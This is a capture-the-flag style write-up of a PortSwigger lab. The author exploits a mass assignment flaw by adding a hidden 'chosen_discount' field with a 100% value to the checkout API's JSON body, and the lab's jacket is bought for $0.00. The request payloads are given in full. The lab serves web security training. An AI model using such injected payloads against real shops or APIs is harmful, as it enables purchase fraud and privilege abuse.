[This lab](https://portswigger.net/web-security/api-testing/lab-exploiting-mass-assignment-vulnerability) demonstrates a classic **mass assignment vulnerability** — where an attacker modifies client-side JSON to include unauthorized parameters that are **recognized and trusted by the backend**. By doing this, the attacker can trigger unintended behavior, such as applying discounts, changing user roles, or escalating privileges. Our objective is to apply a **100% discount** to the **Lightweight "l33t" Leather Jacket** and purchase it without having the required credit. --- ##### Step 1: Add the Target Product to Your Basket - Logged in as `wiener:peter` - Navigated to the **Lightweight "l33t" Leather Jacket** product - Clicked "Add to basket" --- ##### Step 2: Attempt Checkout Clicked "Place order" → Application responded that the user does **not have enough credit**. In Burp's **Proxy > HTTP history**, captured: - `GET /api/checkout` - `POST /api/checkout` Noticed that the **GET response** contained a hidden field: ```json "chosen_discount": { "percentage": 0 } ``` But this field was **absent** from the POST request payload used during checkout. ✅ This discrepancy suggests that `chosen_discount` is a **bindable backend field** — a perfect target for mass assignment. ![[CleanShot 2025-04-14 at 19.39.57.png]] --- ##### Step 3: Replay and Modify the POST /api/checkout Request Sent the checkout request to **Repeater**. Original payload: ```json { "chosen_products": [ { "product_id": "1", "quantity": 1 } ] } ``` Modified payload (with mass assignment): ```json { "chosen_discount": { "percentage": 0 }, "chosen_products": [ { "product_id": "1", "quantity": 1 } ] } ``` Sent → Response was accepted → No error Tried: ```json "chosen_discount": { "percentage": "x" } ``` → Response: error about invalid data type ✅ Confirms the backend is **actively parsing and validating the field** — strong indicator of a vulnerable mass assignment binding. --- ##### Step 4: Exploit – Apply a 100% Discount Final payload: ```json { "chosen_discount": { "percentage": 100 }, "chosen_products": [ { "product_id": "1", "quantity": 1 } ] } ``` Sent the request. → Response: 200 OK → Product purchased at **$0.00** **Lab solved.** --- ## Payload Summary ##### Mass Assignment Payload to Inject Discount ```json { "chosen_discount": { "percentage": 100 }, "chosen_products": [ { "product_id": "1", "quantity": 1 } ] } ``` **Context:** Added a hidden field (`chosen_discount`) based on values found in a GET request **Mechanism:** Backend binds JSON input to internal objects, allowing injection of unauthorized parameters **Effect:** Purchases product with 100% discount ![[CleanShot 2025-04-14 at 19.42.08.png]]